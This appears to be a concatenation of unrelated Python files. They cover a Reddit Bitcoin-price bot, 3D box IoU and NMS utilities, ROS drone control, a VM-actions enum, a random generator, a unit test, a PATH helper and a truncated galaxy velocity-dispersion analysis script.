# spacy.load('/tmp/en_wiki', vocab=nlp.vocab) # used for the time being
warnings.filterwarnings("ignore")
# Global Variables
THRESHOLD = 0.7 # MD-TPM
TREE = None # Final Tree Object
ROOT = None # Final root of Tree
DOC = None # Actual doc object for the function
SENT_RANGE = None
WORD_RANGE = None
SECTION_JOIN_THRESHHOLD = 0.95
NODE_TAGS = ['NOUN', 'ADJ']
PAIR_MAX_CONNECTIONS = 20
SVOs = None
PREPROCESSING_PIPELINE = None
VERB_PHRASES = None # To be set once in the first call of get_relation
# Logging Variables
LOG_FILE = ""
FUNCTION_COUNT = defaultdict(int)
RETURN_LOG_FILE = ""
TIME_LOG = ""
# def get_freq_sorted_dictionary():
# from collections import defaultdict
# f = open("Corpus Frequency Data/20k.txt", "r")
# ranked_words = defaultdict()
# for l1 in f.readlines():
# ranked_words[l1[0:-1]] = len(ranked_words) + 1
# return ranked_words
# WORD_RANKING = get_freq_sorted_dictionary()
|
python
|
import praw
import pdb
import re
import os
from requests import Request, Session
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects
import json
#GET request url
coin_url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
reddit = praw.Reddit('BTC9KBABY') #selects reddit user account. password is in praw.ini file
btc_text = open("prev_price.txt", "r") #opens previous price file
btc_prev = float(btc_text.read())
btc_text.close()
#post submission info if going up
over_title = 'It’s over 9000!!!!'
over_url = 'https://imgur.com/jyoZGyW'
#post submission info if going down
under_title = 'It’s under 9000!!!!'
under_url = 'https://i.imgur.com/SyzEGwl.png'
#opens api key file so that api key is not in source code
key = open('coinmarketcap_api_key.txt')
coin_key = key.read()
#coinmarketcap recommended code
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': coin_key,
}
session = Session()
session.headers.update(headers)
parameters = {
'id':'1' #id 1 belongs to bitcoin
}
#sends GET request
try:
response = session.get(coin_url, params=parameters)
data = json.loads(response.text)
btc = data["data"]["1"]["quote"]["USD"]["price"] #coinmarketcap api request sets btc price
    print(str(data["data"]["1"]["quote"]["USD"]["price"]) + '\n \n API request successful.')
except (ConnectionError, Timeout, TooManyRedirects) as e:
    print(e)
    raise SystemExit(e)  # btc is never set if the request failed, so stop here
#price movement comparisons for submission type
if btc > btc_prev and btc > 9000 and btc_prev < 9000:
reddit.subreddit('BTC9K').submit(over_title, url=over_url)
print('over @ ' + str(btc))
elif btc < btc_prev and btc < 9000 and btc_prev > 9000:
reddit.subreddit('BTC9K').submit(under_title, url=under_url)
print('under @ ' + str(btc))
btc_prev = btc
btc_text = open("prev_price.txt", "w") #opens previous price file
btc_text.write(str(btc_prev))
btc_text.close()
|
python
|
"""
3D IoU Calculation and Rotated NMS
Written by Shaoshuai Shi
All Rights Reserved 2019-2020.
"""
import torch
import numpy as np
from opencood.utils.common_utils import check_numpy_to_torch
from opencood.pcdet_utils.iou3d_nms import iou3d_nms_cuda
def boxes_bev_iou_cpu(boxes_a, boxes_b):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
    Returns:
        ans_iou: (N, M)
    """
boxes_a, is_numpy = check_numpy_to_torch(boxes_a)
boxes_b, is_numpy = check_numpy_to_torch(boxes_b)
assert not (boxes_a.is_cuda or boxes_b.is_cuda), 'Only support CPU tensors'
assert boxes_a.shape[1] == 7 and boxes_b.shape[1] == 7
ans_iou = boxes_a.new_zeros(torch.Size((boxes_a.shape[0], boxes_b.shape[0])))
iou3d_nms_cuda.boxes_iou_bev_cpu(boxes_a.contiguous(), boxes_b.contiguous(), ans_iou)
return ans_iou.numpy() if is_numpy else ans_iou
def boxes_iou_bev(boxes_a, boxes_b):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, M)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
ans_iou = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_()
iou3d_nms_cuda.boxes_iou_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), ans_iou)
return ans_iou
def decode_boxes_and_iou3d(boxes_a, boxes_b, pc_range, box_mean, box_std):
"""
Transform the boxes format back to [x, y, z, dx, dy, dz, heading] and calculate iou
:param boxes_a: (N, 7) [x_n, y_n, z_n, dx_n, dy_n, dz_n, heading_n] normalized
:param boxes_b: (M, 7) [x_n, y_n, z_n, dx_n, dy_n, dz_n, heading_n]
:param pc_range: point cloud range
    :param box_mean: mean used to de-standardize the box encoding
    :param box_std: standard deviation used to de-standardize the box encoding
:return: ans_iou: (N, M)
"""
boxes_a_dec = decode_boxes(boxes_a, pc_range, box_mean, box_std)
boxes_b_dec = decode_boxes(boxes_b, pc_range, box_mean, box_std)
iou = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec)
return iou
def decode_boxes(boxes, pc_range, box_mean, box_std):
assert len(boxes.shape)==2
assert boxes.shape[1]==8
if isinstance(box_mean, list):
box_mean = torch.tensor(box_mean, device=boxes.device)
if isinstance(box_std, list):
box_std = torch.tensor(box_std, device=boxes.device)
boxes = boxes * box_std[None, :] + box_mean[None, :]
boxes_out = torch.zeros((boxes.shape[0], 7), dtype=boxes.dtype, device=boxes.device)
for i in range(3):
boxes_out[:, i] = boxes[:, i] * (pc_range[i + 3] - pc_range[i]) + pc_range[i]
boxes_out[:, 3:6] = boxes[:, 3:6].exp()
boxes_out[:, 6] = torch.atan2(boxes[:, 6], boxes[:, 7])
return boxes_out
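# Decoding recap: inputs are 8-dim standardized boxes
# [x_n, y_n, z_n, log dx, log dy, log dz, sin(heading), cos(heading)];
# after de-standardizing with box_mean/box_std, centers are rescaled into
# pc_range, sizes are exponentiated, and heading is recovered via atan2.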
def decode_boxes_and_giou3d(boxes_a, boxes_b, pc_range, box_mean, box_std):
boxes_a_dec = decode_boxes(boxes_a, pc_range, box_mean, box_std)
boxes_b_dec = decode_boxes(boxes_b, pc_range, box_mean, box_std)
corners_a = centroid_to_corners(boxes_a_dec)
corners_b = centroid_to_corners(boxes_b_dec)
iou, union = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec, return_union=True)
lwh = torch.max(corners_a.max(dim=1)[0][:, None, :], corners_b.max(dim=1)[0]) \
-torch.min(corners_a.min(dim=1)[0][:, None, :], corners_b.min(dim=1)[0])
volume = lwh[..., 0] * lwh[..., 1] * lwh[..., 2]
giou = iou - (volume - union) / volume
return giou
def giou3d(boxes_a_dec, boxes_b_dec):
corners_a = centroid_to_corners(boxes_a_dec)
corners_b = centroid_to_corners(boxes_b_dec)
iou, union = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec, return_union=True)
lwh = torch.max(corners_a.max(dim=1)[0][:, None, :], corners_b.max(dim=1)[0]) \
-torch.min(corners_a.min(dim=1)[0][:, None, :], corners_b.min(dim=1)[0])
volume = lwh[..., 0] * lwh[..., 1] * lwh[..., 2]
giou = iou - (volume - union) / volume
return giou
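# GIoU recap: giou = iou - (V_enclose - V_union) / V_enclose, where V_enclose is
# the volume of the axis-aligned box enclosing both sets of corners.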
def aligned_boxes_iou3d_gpu(boxes_a, boxes_b, return_union=False):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, 1)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
assert boxes_a.shape[0] == boxes_b.shape[0]
# height overlap
boxes_a_height_max = (boxes_a[:, 2] + boxes_a[:, 5] / 2).view(-1, 1)
boxes_a_height_min = (boxes_a[:, 2] - boxes_a[:, 5] / 2).view(-1, 1)
boxes_b_height_max = (boxes_b[:, 2] + boxes_b[:, 5] / 2).view(-1, 1)
boxes_b_height_min = (boxes_b[:, 2] - boxes_b[:, 5] / 2).view(-1, 1)
# bev overlap
overlaps_bev = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_() # (N, M)
iou3d_nms_cuda.boxes_overlap_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), overlaps_bev)
overlaps_bev = torch.diagonal(overlaps_bev).reshape(-1, 1)
max_of_min = torch.max(boxes_a_height_min, boxes_b_height_min)
min_of_max = torch.min(boxes_a_height_max, boxes_b_height_max)
overlaps_h = torch.clamp(min_of_max - max_of_min, min=0)
# 3d iou
overlaps_3d = overlaps_bev * overlaps_h
vol_a = (boxes_a[:, 3] * boxes_a[:, 4] * boxes_a[:, 5]).view(-1, 1)
vol_b = (boxes_b[:, 3] * boxes_b[:, 4] * boxes_b[:, 5]).view(-1, 1)
union = torch.clamp(vol_a + vol_b - overlaps_3d, min=1e-6)
iou3d = overlaps_3d / union
if return_union:
return iou3d, union
return iou3d
def boxes_iou3d_gpu(boxes_a, boxes_b, return_union=False):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, M)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
# height overlap
boxes_a_height_max = (boxes_a[:, 2] + boxes_a[:, 5] / 2).view(-1, 1)
boxes_a_height_min = (boxes_a[:, 2] - boxes_a[:, 5] / 2).view(-1, 1)
boxes_b_height_max = (boxes_b[:, 2] + boxes_b[:, 5] / 2).view(1, -1)
boxes_b_height_min = (boxes_b[:, 2] - boxes_b[:, 5] / 2).view(1, -1)
# bev overlap
overlaps_bev = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_() # (N, M)
iou3d_nms_cuda.boxes_overlap_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), overlaps_bev)
max_of_min = torch.max(boxes_a_height_min, boxes_b_height_min)
min_of_max = torch.min(boxes_a_height_max, boxes_b_height_max)
overlaps_h = torch.clamp(min_of_max - max_of_min, min=0)
# 3d iou
overlaps_3d = overlaps_bev * overlaps_h
vol_a = (boxes_a[:, 3] * boxes_a[:, 4] * boxes_a[:, 5]).view(-1, 1)
vol_b = (boxes_b[:, 3] * boxes_b[:, 4] * boxes_b[:, 5]).view(1, -1)
union = torch.clamp(vol_a + vol_b - overlaps_3d, min=1e-6)
iou3d = overlaps_3d / union
if return_union:
return iou3d, union
return iou3d
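# Note: aligned_boxes_iou3d_gpu above computes the same quantity but only for
# matched pairs (the diagonal of the BEV overlap matrix), returning (N, 1).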
def centroid_to_corners(boxes):
if isinstance(boxes, np.ndarray):
corners = _centroid_to_corners_np(boxes)
elif isinstance(boxes, torch.Tensor):
corners = _centroid_to_corners_torch(boxes)
else:
raise TypeError('Input boxes should either be numpy array or torch tensor.')
return corners
def _centroid_to_corners_torch(boxes):
'''Convert boxes from centroid format to corners
:param boxes: [N, 7]
:return: corners: [N, 8, 3]
'''
corners = torch.zeros((boxes.shape[0], 8, 3), dtype=boxes.dtype, device=boxes.device)
sin_t = torch.sin(boxes[:, -1])
cos_t = torch.cos(boxes[:, -1])
corners[:, ::4, 0] = torch.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, dim=1) # lfx
corners[:, ::4, 1] = torch.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, dim=1) # lfy
corners[:, 1::4, 0] = torch.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, dim=1) # lbx
corners[:, 1::4, 1] = torch.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, dim=1) # lby
corners[:, 2::4, 0] = torch.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, dim=1) # rbx
corners[:, 2::4, 1] = torch.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, dim=1) # rby
corners[:, 3::4, 0] = torch.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, dim=1) # rfx
corners[:, 3::4, 1] = torch.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, dim=1) # rfy
corners[:, :, 2] = torch.cat([torch.stack([boxes[:, 2] - boxes[:, 5] / 2] * 4, dim=1),
torch.stack([boxes[:, 2] + boxes[:, 5] / 2] * 4, dim=1)], dim=1)
return corners
def _centroid_to_corners_np(boxes):
'''Convert boxes from centroid format to corners
:param boxes: [N, 7]
:return: corners: [N, 8, 3]
'''
corners = np.zeros((boxes.shape[0], 8, 3), dtype=boxes.dtype)
sin_t = np.sin(boxes[:, -1])
cos_t = np.cos(boxes[:, -1])
corners[:, ::4, 0] = np.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, axis=1) # lfx
corners[:, ::4, 1] = np.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, axis=1) # lfy
corners[:, 1::4, 0] = np.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, axis=1) # lbx
corners[:, 1::4, 1] = np.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, axis=1) # lby
corners[:, 2::4, 0] = np.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, axis=1) # rbx
corners[:, 2::4, 1] = np.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, axis=1) # rby
corners[:, 3::4, 0] = np.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, axis=1) # rfx
corners[:, 3::4, 1] = np.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, axis=1) # rfy
corners[:, :, 2] = np.concatenate([np.stack([boxes[:, 2] - boxes[:, 5] / 2] * 4, axis=1),
np.stack([boxes[:, 2] + boxes[:, 5] / 2] * 4, axis=1)], axis=1)
return corners
def rotate_weighted_nms_gpu(
box_preds,
rbboxes,
dir_labels,
labels_preds,
scores,
iou_preds,
anchors,
pre_max_size=None,
post_max_size=None,
iou_threshold=0.5,
):
"""Original definition can be found in CIA_SSD paper"""
if pre_max_size is not None:
num_keeped_scores = scores.shape[0]
def nms_gpu(boxes, scores, thresh, pre_maxsize=None, **kwargs):
"""
Operate on rotated bev boxes[x,y,dx,dy,heading]
:param boxes: (N, 7) [x, y, z, dx, dy, dz, heading]
:param scores: (N)
:param thresh:
:return:
"""
assert boxes.shape[1] == 7
order = scores.sort(0, descending=True)[1]
if pre_maxsize is not None:
order = order[:pre_maxsize]
boxes = boxes[order].contiguous()
keep = torch.LongTensor(boxes.size(0))
num_out = iou3d_nms_cuda.nms_gpu(boxes, keep, thresh)
return order[keep[:num_out].cuda()].contiguous(), None
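# Hypothetical usage (CUDA tensors assumed; thresh is the rotated-BEV IoU cutoff):
#     keep, _ = nms_gpu(pred_boxes, pred_scores, thresh=0.1, pre_maxsize=4096)
#     pred_boxes = pred_boxes[keep]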
def nms_normal_gpu(boxes, scores, thresh, **kwargs):
"""
Ignore heading and operate on bev boxes[x,y,dx,dy]
:param boxes: (N, 7) [x, y, z, dx, dy, dz, heading]
:param scores: (N)
:param thresh:
:return:
"""
assert boxes.shape[1] == 7
order = scores.sort(0, descending=True)[1]
boxes = boxes[order].contiguous()
keep = torch.LongTensor(boxes.size(0))
num_out = iou3d_nms_cuda.nms_normal_gpu(boxes, keep, thresh)
return order[keep[:num_out].cuda()].contiguous(), None
|
python
|
#! /usr/bin/env python
import rospy
import threading
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from controlmulti import *
from callback_alvar import *
if __name__ == '__main__':
# try:
rospy.init_node('control_node', anonymous= False)
rate = rospy.Rate(10)
drone_1 = ('192.168.11.40', 8889)
drone_2 = ('192.168.11.33', 8889)
drone_3 = ('192.168.11.23', 8889)
drone = [drone_1, drone_2, drone_3]
    # goal keys used to look up each marker's goal position
    goal = ["front22", "left26", "right24"]
# drone_4 = ('192.168.11.57', 8889)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
sleep(1)
receiveThread = threading.Thread(target=receive)
receiveThread.daemon = True
receiveThread.start()
#enter sdk mode
send("command", 0, drone_1)
send("command", 0, drone_2)
send("command", 0, drone_3)
sleep(3)
#takeoff
send("takeoff", 0, drone_1)
send("takeoff", 0, drone_2)
send("takeoff", 0, drone_3)
sleep(8)
#form a line to a non AR (manual)
#use marker first to get the position
send("go -100 -20 60 10", 0, drone_1)
send("go 70 20 100 10 ", 0, drone_2)
send("go 70 30 60 10", 0, drone_3)
sleep(1)
def feedbackcontrol(drone,goal):
count = 0
robot_in_pos = False
i = 0
while not rospy.is_shutdown():
            for N in range(len(drone)):  # iterate by index so drone[N] works below
if count == 40:
send("land", 0, drone[N])
# send("land", 0, drone_2)
# send("land", 0, drone_3)
print("Mission failed")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
if not robot_in_pos:
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
(drone_x, drone_y, goal_x, goal_y) = callback_alvmarker(AlvarMsg)
if drone_x != 0.0 and drone_y != 0.0 and goal_x[i] != 0.0 and goal_y[i] != 0.0:
#rotate drone to initial angle
print('\r\nDrone Position:')
print('x = %.2f' % drone_x)
print('y = %.2f' % drone_y)
print('')
sleep(1)
robot_in_pos = True
elif drone_x != 0.0 and drone_y != 0.0 and goal_x[i] == 0.0 and goal_y[i] == 0.0:
print("Mission completed successfully!")
robot_in_pos = False
i += 1
if i == 1:
robot_in_pos = False
send("land", 0, drone[N])
# send("land", 0, drone_2)
# send("land", 0, drone_3)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
robot_in_pos = False
count += 1
else:
#update the drone's current position
(drone_x, drone_y, goal_x, goal_y) = callback_alvmarker(AlvarMsg)
print ("drone x: %3.3f , drone y: %3.3f" % (drone_x, drone_y))
                        for j in range(len(drone)):  # iterate by index
status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y, drone[j])
# sleep(1)
# status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y, drone_2)
sleep(1)
if status == 'Goal Position reached':
print("Mission completed successfully!")
robot_in_pos = False
i += 1
if i == 1: #number of goals
robot_in_pos = False
send("land", 0, drone)
# send("land", 0, drone_2)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
count += 1
drone_x, drone_y = (0.0, 0.0)
goal_x[i], goal_y[i] = (0.0, 0.0)
robot_in_pos = False
    # feedbackcontrol iterates over the full drone list internally, so it is
    # called once with the list of drones and the goal keys defined above
    feedbackcontrol(drone, goal)
# except rospy.ROSInterruptException:
# send("land", 0, drone_1)
# send("land", 0, drone_2)
# sock1.close()
# print('Simulation terminated')
# pass
|
python
|
from enum import auto
import graphene
from serflag import SerFlag
from handlers.graphql.types.access import create_access_type
class VMActions(SerFlag):
attach_vdi = auto()
attach_network = auto()
rename = auto()
change_domain_type = auto()
VNC = auto()
launch_playbook = auto()
changing_VCPUs = auto()
changing_memory_limits = auto()
snapshot = auto()
clone = auto()
copy = auto()
create_template = auto()
revert = auto()
checkpoint = auto()
snapshot_with_quiesce = auto()
#provision = auto()
start = auto()
start_on = auto()
pause = auto()
unpause = auto()
clean_shutdown = auto()
clean_reboot = auto()
hard_shutdown = auto()
power_state_reset = auto()
hard_reboot = auto()
suspend = auto()
csvm = auto()
resume = auto()
resume_on = auto()
pool_migrate = auto()
migrate_send = auto()
shutdown = auto()
destroy = auto()
GVMActions = graphene.Enum.from_enum(VMActions)
GVMAccessEntry = create_access_type("GVMAccessEntry", GVMActions)
|
python
|
import numpy as np
from typing import Tuple, Union
from .values_generator import ValuesGenerator
class UniformGenerator(ValuesGenerator):
def __init__(
self,
bounds: Tuple[Union[int, float], Union[int, float]],
resolution: int = 1_000,
seed: int = None,
):
super(UniformGenerator, self).__init__(bounds, resolution, seed)
self.generator = np.random.default_rng(seed=seed)
def __call__(self, n: int = 1):
return self.generator.uniform(self.bounds[0], self.bounds[1], size=n)
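# Hypothetical usage: five reproducible uniform draws in [0, 10).
#     gen = UniformGenerator(bounds=(0, 10), seed=42)
#     samples = gen(5)  # array of 5 floats in [0, 10)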
|
python
|
from mimesis import Person
from tests.base import BaseTestCase
from tests.utils import add_user, add_group, add_user_group_association
class TestGroupModel(BaseTestCase):
"""
Test Group model
"""
# Generate fake data with mimesis
data_generator = Person('en')
def test_model_group_add_group(self):
"""Ensure a group can be added"""
group_name = self.data_generator.occupation()
group = add_group(name=group_name)
self.assertTrue(group.id)
self.assertEqual(group.name, group_name)
self.assertTrue(group.created_at)
self.assertTrue(group.updated_at)
self.assertEqual(len(group.associated_users), 0)
self.assertEqual(len(group.users), 0)
def test_model_group_verify_associated_users(self):
"""Ensure an added group has associated users"""
user = add_user()
group_name = self.data_generator.occupation()
group = add_group(name=group_name)
self.assertEqual(len(group.associated_users), 0)
add_user_group_association(user=user, group=group)
self.assertEqual(len(group.associated_users), 1)
self.assertEqual(group.associated_users[0].user.username, user.username)
self.assertEqual(len(group.users), 1)
self.assertEqual(group.users[0].username, user.username)
self.assertEqual(len(user.groups), 1)
self.assertEqual(user.groups[0].name, group_name)
|
python
|
'''
Usage:
python remove_from_env.py $PATH $TO_BE_REMOVED
returns $PATH without paths starting with $TO_BE_REMOVED
'''
import sys
ENV = sys.argv[1]
REMOVE = sys.argv[2]
new_path = []
for path in ENV.split(':'):
if path.startswith(REMOVE):
continue
new_path.append(path)
print(':'.join(new_path))
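# Example: python remove_from_env.py "/usr/bin:/opt/foo/bin:/bin" "/opt/foo"
# prints "/usr/bin:/bin"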
|
python
|
"""
This script calculates spread in velocity dispersion (sigma) from mocks for
red and blue galaxies as well as smf for red and blue galaxies. It then
calculates a full correlation matrix using sigma and smf of both galaxy
populations as well as a correlation matrix of just sigma
measurements of both galaxy populations.
Mean velocity dispersion of red and blue galaxies in bins of central stellar
mass from data and mocks is also compared.
"""
# Libs
from cosmo_utils.utils import work_paths as cwpaths
from scipy.stats import normaltest as nt
import matplotlib.pyplot as plt
from matplotlib import cm as cm
from matplotlib import rc
from scipy.stats import binned_statistic as bs
import random
import pandas as pd
import numpy as np
import os
__author__ = 'Mehnaaz Asad'
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']}, size=20)
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('xtick.major', width=2, size=7)
rc('ytick.major', width=2, size=7)
def reading_catls(filename, catl_format='.hdf5'):
"""
Function to read ECO/RESOLVE catalogues.
Parameters
----------
filename: string
path and name of the ECO/RESOLVE catalogue to read
catl_format: string, optional (default = '.hdf5')
type of file to read.
Options:
- '.hdf5': Reads in a catalogue in HDF5 format
Returns
-------
mock_pd: pandas DataFrame
DataFrame with galaxy/group information
Examples
--------
# Specifying `filename`
>>> filename = 'ECO_catl.hdf5'
# Reading in Catalogue
    >>> mock_pd = reading_catls(filename, catl_format='.hdf5')
>>> mock_pd.head()
x y z vx vy vz \
0 10.225435 24.778214 3.148386 356.112457 -318.894409 366.721832
1 20.945772 14.500367 -0.237940 168.731766 37.558834 447.436951
2 21.335835 14.808488 0.004653 967.204407 -701.556763 -388.055115
3 11.102760 21.782235 2.947002 611.646484 -179.032089 113.388794
4 13.217764 21.214905 2.113904 120.689598 -63.448833 400.766541
loghalom cs_flag haloid halo_ngal ... cz_nodist vel_tot \
0 12.170 1 196005 1 ... 2704.599189 602.490355
1 11.079 1 197110 1 ... 2552.681697 479.667489
2 11.339 1 197131 1 ... 2602.377466 1256.285409
3 11.529 1 199056 1 ... 2467.277182 647.318259
4 10.642 1 199118 1 ... 2513.381124 423.326770
vel_tan vel_pec ra_orig groupid M_group g_ngal g_galtype \
0 591.399858 -115.068833 215.025116 0 11.702527 1 1
1 453.617221 155.924074 182.144134 1 11.524787 4 0
2 1192.742240 394.485714 182.213220 1 11.524787 4 0
3 633.928896 130.977416 210.441320 2 11.502205 1 1
4 421.064495 43.706352 205.525386 3 10.899680 1 1
halo_rvir
0 0.184839
1 0.079997
2 0.097636
3 0.113011
4 0.057210
"""
## Checking if file exists
if not os.path.exists(filename):
msg = '`filename`: {0} NOT FOUND! Exiting..'.format(filename)
raise ValueError(msg)
## Reading file
if catl_format=='.hdf5':
mock_pd = pd.read_hdf(filename)
else:
msg = '`catl_format` ({0}) not supported! Exiting...'.format(catl_format)
raise ValueError(msg)
return mock_pd
def read_data_catl(path_to_file, survey):
"""
Reads survey catalog from file
Parameters
----------
path_to_file: `string`
Path to survey catalog file
survey: `string`
Name of survey
Returns
---------
catl: `pandas.DataFrame`
Survey catalog with grpcz, abs rmag and stellar mass limits
volume: `float`
Volume of survey
z_median: `float`
Median redshift of survey
"""
if survey == 'eco':
# columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag',
# 'logmstar', 'logmgas', 'grp', 'grpn', 'logmh', 'logmh_s',
# 'fc', 'grpmb', 'grpms','modelu_rcorr']
# # 13878 galaxies
# eco_buff = pd.read_csv(path_to_file,delimiter=",", header=0, \
# usecols=columns)
eco_buff = reading_catls(path_to_file)
if mf_type == 'smf':
# 6456 galaxies
catl = eco_buff.loc[(eco_buff.grpcz.values >= 3000) &
(eco_buff.grpcz.values <= 7000) &
(eco_buff.absrmag.values <= -17.33)]
elif mf_type == 'bmf':
catl = eco_buff.loc[(eco_buff.grpcz.values >= 3000) &
(eco_buff.grpcz.values <= 7000) &
(eco_buff.absrmag.values <= -17.33)]
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
# cvar = 0.125
z_median = np.median(catl.grpcz.values) / (3 * 10**5)
elif survey == 'resolvea' or survey == 'resolveb':
columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag',
'logmstar', 'logmgas', 'grp', 'grpn', 'grpnassoc', 'logmh',
'logmh_s', 'fc', 'grpmb', 'grpms', 'f_a', 'f_b']
# 2286 galaxies
resolve_live18 = pd.read_csv(path_to_file, delimiter=",", header=0, \
usecols=columns)
if survey == 'resolvea':
if mf_type == 'smf':
catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17.33)]
elif mf_type == 'bmf':
catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17.33)]
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
# cvar = 0.30
z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)
elif survey == 'resolveb':
if mf_type == 'smf':
# 487 - cz, 369 - grpcz
catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17)]
elif mf_type == 'bmf':
catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17)]
volume = 4709.8373 # *2.915 #Survey volume without buffer [Mpc/h]^3
# cvar = 0.58
z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)
return catl, volume, z_median
def assign_colour_label_data(catl):
"""
Assign colour label to data
Parameters
----------
catl: pandas Dataframe
Data catalog
Returns
---------
catl: pandas Dataframe
Data catalog with colour label assigned as new column
"""
logmstar_arr = catl.logmstar.values
u_r_arr = catl.modelu_rcorr.values
colour_label_arr = np.empty(len(catl), dtype='str')
for idx, value in enumerate(logmstar_arr):
# Divisions taken from Moffett et al. 2015 equation 1
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
if value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
if value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
catl['colour_label'] = colour_label_arr
return catl
def std_func(bins, mass_arr, vel_arr):
## Calculate std from mean=0
last_index = len(bins)-1
i = 0
std_arr = []
for index1, bin_edge in enumerate(bins):
cen_deltav_arr = []
if index1 == last_index:
break
for index2, stellar_mass in enumerate(mass_arr):
if stellar_mass >= bin_edge and stellar_mass < bins[index1+1]:
cen_deltav_arr.append(vel_arr[index2])
N = len(cen_deltav_arr)
mean = 0
diff_sqrd_arr = []
for value in cen_deltav_arr:
diff = value - mean
diff_sqrd = diff**2
diff_sqrd_arr.append(diff_sqrd)
mean_diff_sqrd = np.mean(diff_sqrd_arr)
std = np.sqrt(mean_diff_sqrd)
std_arr.append(std)
return std_arr
def std_func_mod(bins, mass_arr, vel_arr):
mass_arr_bin_idxs = np.digitize(mass_arr, bins)
    # Fold galaxies beyond the last bin edge into the final bin, i.e. digitize
    # indices 5 and 6 both map to bin 5
for idx, value in enumerate(mass_arr_bin_idxs):
if value == 6:
mass_arr_bin_idxs[idx] = 5
mean = 0
std_arr = []
for idx in range(1, len(bins)):
cen_deltav_arr = []
current_bin_idxs = np.argwhere(mass_arr_bin_idxs == idx)
cen_deltav_arr.append(np.array(vel_arr)[current_bin_idxs])
diff_sqrd_arr = []
